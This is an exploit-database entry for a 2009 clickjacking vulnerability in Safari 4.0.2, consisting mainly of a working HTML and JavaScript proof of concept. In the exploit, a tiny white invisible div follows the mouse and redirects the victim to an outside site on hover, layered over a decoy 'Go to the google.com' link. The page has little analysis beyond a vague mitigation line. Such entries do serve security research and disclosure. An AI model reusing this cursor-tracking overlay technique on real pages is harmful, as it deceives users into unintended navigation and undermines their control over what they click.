header-logo
Suggest Exploit
vendor:
Safari
by:
Pouya Daneshmand
7,5
CVSS
HIGH
Clickjacking
N/A
CWE
Product Name: Safari
Affected Version From: 4.0.2
Affected Version To: 4.0.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Safari Browser (V4.0.2) Clickjacking

This vulnerability allows an attacker to trick a user into clicking on a malicious link or button by overlaying it on top of a legitimate link or button. This vulnerability affects Safari Browser version 4.0.2.

Mitigation:

The best way to mitigate this vulnerability is to ensure that users are aware of the risks of clickjacking and to ensure that they are not tricked into clicking on malicious links.
Source

Exploit-DB raw data:

<html>
<style type="text/css">
</style>
<body>
<p align="center"><code class="xml plain"><font face="Calibri" size="6">
Safari</font><font face="Calibri" size="6" color="#FF0000">
</font><font face="Calibri" size="6"> Browser</font><font face="Calibri" size="6" color="#FF0000"> </font></code>
<font face="Arial" size="2"><code class="xml plain">
(V4.0.2)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
<b>Clickjacking</b></code></font></p>
<p align="center"> </p>
<div class="style1" id="open"
style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
<p align="center">
<font size="1" color="#FFFFFF">ClickJacking</font></div>
<p align="center"><strong>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
</strong><a href="http://www.google.com" onClick="updatebox(event)"><font
style="font-family:arial;font-size:32px">Go to the google.com</font></a></p>
<p><br>
</p>
<div class="style1" id="open0"
style="position:absolute; width:2px; height:13px; background:#FFFFFF; border:1px none; left: 354px; top: 146px;"
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
<p align="center">
<p align="center">
<font size="1" color="#FFFFFF">ClickJacking</font></div>
<p align="center"> </p>
<p align="center"> </p>
<p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
<p align="center">http://Securitylab.ir/Advisory</p>
</html>

Navigation

Suggest Exploit

Services By CQR